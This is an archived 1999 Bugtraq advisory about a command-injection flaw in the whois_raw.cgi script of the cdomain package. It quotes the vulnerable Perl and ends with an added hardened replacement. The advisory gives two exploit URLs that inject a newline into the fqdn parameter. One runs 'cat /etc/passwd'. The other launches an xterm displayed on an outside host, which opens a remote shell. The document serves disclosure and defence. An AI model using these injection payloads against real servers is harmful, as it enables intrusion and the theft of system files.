List: bugtraq
Subject: whois_raw.cgi problem
From: Salvatore Sanfilippo -antirez- <md5330 () MCLINK ! IT>
Date: 1999-05-31 22:34:51
Hi,
Sorry if this is already known.
There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.
#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
    @result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
    @result="Dettagli non disponibili per il dominio richiesto.";
} else {
    @result=`$whois_cmd $fqdn`;
}
...
The exploit is a banal and well-known problem:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
bye,
antirez
--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)
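
An added example, not part of the original post or of the cdomain package: a hardened replacement for the backtick call quoted above, which validates `fqdn` as a hostname and runs whois without a shell. The whois path, the sub names and the sample inputs are assumptions made for the illustration.

```perl
#!/usr/bin/perl
# Added example (not cdomain code): hardened form of the whois call.
use strict;
use warnings;

# Assumption: location of the whois client. The original script's
# $whois_cmd value is not shown in the post.
my $WHOIS_CMD = '/usr/bin/whois';

# Accept only DNS hostnames: dot-separated labels made of letters, digits
# and inner hyphens, ending in an alphabetic TLD, 253 characters at most.
# \A and \z anchor the whole string; with ^ and $ a trailing newline would
# still match. A leading "-" is rejected too, so the value can never be
# read by whois as an option.
sub valid_fqdn {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 253;
    return $name =~ /\A(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}\z/ ? 1 : 0;
}

# Run whois with the list form of open(): the program is exec'd directly
# and $fqdn is passed as a single argv element, so no shell ever parses it.
sub run_whois {
    my ($fqdn) = @_;
    return ("Invalid domain name.\n") unless valid_fqdn($fqdn);
    open(my $fh, '-|', $WHOIS_CMD, $fqdn)
        or return ("whois lookup failed.\n");
    my @result = <$fh>;
    close($fh);
    return @result;
}

# Constructed inputs: an ordinary name, the decoded fqdn value from the
# first request in the post, and two further malformed values.
for my $input ("example.com", "\ncat /etc/passwd", "example.com\n", "-h example.com") {
    (my $shown = $input) =~ s/\n/\\n/g;
    printf "%-22s %s\n", "'$shown'", valid_fqdn($input) ? "accepted" : "rejected";
}
```

Either measure alone closes the hole shown in the post; using both means a later loosening of the pattern still cannot reach a shell.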